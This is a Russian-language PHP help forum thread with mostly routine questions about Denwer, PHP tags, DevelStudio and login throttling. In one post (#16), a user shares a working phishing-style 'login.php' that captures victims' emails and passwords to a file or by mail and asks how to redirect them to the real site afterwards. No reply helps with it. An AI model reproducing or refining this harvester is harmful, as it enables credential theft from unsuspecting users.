[ PHP ] Ответы на вопросы
|
|
karabawka |
Дата: Четверг, 05.06.2014, 13:31 | Сообщение # 1
|
Главный предприниматель
Статус: Offline
|
[ PHP ] Вопрос-Ответ В данной теме Вы можете задать любой интересующий Вас вопрос по поводу программирования на PHP.
Скрипт не работает? Интерпретатор выдает непонятные ошибки? Задайте вопрос здесь, не создавайте по поводу мелочей отдельные темы. Люди, разбирающиеся в веб-программировании обязательно ответят на ваш вопрос и проблема будет решена! Форма вопроса:
Код [b]Вопрос:[/b] - [b]Приложения(Скриншоты/код скрипта и т.д.):[/b] -
by karabawka
|
|
|
|
on3shot |
Дата: Среда, 31.12.2014, 04:14 | Сообщение # 16
|
Любитель
|
Мне нужно настроить login.php, а именно так, чтобы после введения пароля, перебрасывало людей на реальный сайт. <?php /* */ $BASE="base.php"; $IS_EMAIL=false; $LOCATION="тут я вводил ссылки, не помогает";
$p0=$_REQUEST["email"]; $p1=$_REQUEST["pass"]; $headers = ""; $info="$p0:$p1\n";
if ($IS_EMAIL){ mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info); } else { $fd=fopen($BASE,"a+"); fwrite($fd,$info); fclose($fd); }
header("Location:$LOCATION"); ?>
Как сделать это? Помогите smile
|
|
|
|
DeZi1317 |
Дата: Среда, 31.12.2014, 11:31 | Сообщение # 17
|
Новичок
|
Зачем дублировать вопрос?
.
|
|
|
|
Madera |
Дата: Суббота, 10.01.2015, 15:55 | Сообщение # 18
|
Новичок
|
Вопрос: - Можете сделать чтобы при заходе на сайт запрашивался логин и пароль, и чтоб если больше 5 раз неправильных вводов, айпи вводился в чёрный список? Приложения(Скриншоты/код скрипта и т.д.): -
Cleo программирование
|
|
|
|
Radiance |
Дата: Среда, 21.01.2015, 15:48 | Сообщение # 19
|
Боец
|
Madera, если что то нужно сделать за тебя, то проще сразу пиши "закажу", а не в вопросы и ответы.
Радик камбек :D
|
|
|
|
Just-A-Man |
Дата: Понедельник, 11.05.2015, 00:02 | Сообщение # 20
|
Coder
|
Вопрос: изучаю php, перешел к практике, а интерпретатор php некорретно работает на denwer, то есть сохраняю страницу в формате php, открываю браузер, а там весь исходник страницы, как решить проблему? Приложения(Скриншоты/код скрипта и т.д.): не требуется
Сообщение отредактировал Just-A-Man - Понедельник, 11.05.2015, 00:02 |
|
|
|
Nutsuk |
Дата: Вторник, 12.05.2015, 18:22 | Сообщение # 21
|
Боец
|
Just-A-Man, Довольно глупый вопрос, но все же. Денвер запущен? Правильно ли открываешь файл? Я имею ввиду то, что должно быть http://test1.ru/file.php, а не С:\denwer\home\test1.ru\www\file.php
|
|
|
|
Just-A-Man |
Дата: Вторник, 12.05.2015, 23:57 | Сообщение # 22
|
Coder
|
Цитата Nutsuk ( ) Довольно глупый вопрос, но все же. Денвер запущен? Правильно ли открываешь файл? Я имею ввиду то, что должно быть http://test1.ru/file.php, а не С:\denwer\home\test1.ru\www\file.php сам то понял, что написал? Читай внимательно прежде чем говорить, что вопрос глупый. http://test1.ru/file.php все равно путь до file.php - Z:\home\test1.ru\www\file.php (file:///z:/home/test1.ru/www/file.php) в моем случае, а Z - это виртуальный диск denwer. крч, не помогло...
Сообщение отредактировал Just-A-Man - Среда, 13.05.2015, 00:06 |
|
|
|
Bluetooth |
Дата: Среда, 13.05.2015, 00:28 | Сообщение # 23
|
Бывалый
|
Just-A-Man, Я тебе советую , не денвер устанавливать , а open server , там очень много фишек и плюшек
|
|
|
|
karabawka |
Дата: Среда, 13.05.2015, 01:57 | Сообщение # 24
|
Главный предприниматель
|
Цитата Just-A-Man ( ) Вопрос: изучаю php, перешел к практике, а интерпретатор php некорретно работает на denwer, то есть сохраняю страницу в формате php, открываю браузер, а там весь исходник страницы, как решить проблему? Приложения(Скриншоты/код скрипта и т.д.): не требуется
Возможно из-за версии PHP. Проверь границы скрипта, чтобы были такие: <?php код скрипта ?> , а не такие <? код скрипта ?> , причем везде, во всех скриптах. У меня была такая ситуация даже не на денвере, а на нормальном виртуальном сервере после переноса сайта на другую версию PHP.
|
|
|
|
Just-A-Man |
Дата: Среда, 13.05.2015, 16:38 | Сообщение # 25
|
Coder
|
Цитата Bluetooth ( ) open server спасибо попробую
Цитата karabawka ( ) Возможно из-за версии PHP. Проверь границы скрипта, чтобы были такие: <?php код скрипта ?> , а не такие <? код скрипта ?> , причем везде, во всех скриптах. У меня была такая ситуация даже не на денвере, а на нормальном виртуальном сервере после переноса сайта на другую версию PHP. у меня всегда такие <?php source ?>
|
|
|
|
karabawka |
Дата: Среда, 13.05.2015, 19:44 | Сообщение # 26
|
Главный предприниматель
|
Just-A-Man, значит, вероятно, с самим PHP на денвере проблемы, скрипты не "воспринимаются", так скажем. Попробуй переустановить его, или же установить альтернативу Денверу.
|
|
|
|
proLansky |
Дата: Понедельник, 14.09.2015, 12:03 | Сообщение # 27
|
Новичок
|
Цитата karabawka ( ) Just-A-Man, значит, вероятно, с самим PHP на денвере проблемы, скрипты не "воспринимаются", так скажем. Попробуй переустановить его, или же установить альтернативу Денверу.
нет, проблемы в кодировке. Для редактирования Php файлов не нужно ограничиваться блокнотом. а скачать web редактор. и сохранять файлы в нужной кодировке
|
|
|
|
Just-A-Man |
Дата: Вторник, 10.11.2015, 02:57 | Сообщение # 28
|
Coder
|
Цитата proLansky ( ) нет, проблемы в кодировке. Для редактирования Php файлов не нужно ограничиваться блокнотом. а скачать web редактор. и сохранять файлы в нужной кодировке проблема решена и эта проблема была не в кодировке
|
|
|
|
KOT1 |
Дата: Понедельник, 07.12.2015, 17:06 | Сообщение # 29
|
Новичок
|
Вопрос (PHP Devel Studio): Написал в ней программу. Проект скомпилировался, а сама программа не открывается (Окна нету, но в списке процессов она есть. Причём с памятью от 114 до 120 КБ). Какие решения есть?
|
|
|
|
Radiance |
Дата: Вторник, 03.05.2016, 10:15 | Сообщение # 30
|
Боец
|
KOT1, я, конечно, не настолько жестокий говнарь, но попробую прежположить, что у тебя где то в свойствах проекта не указано стартовое активное окно.
Радик камбек :D
|
|
|
|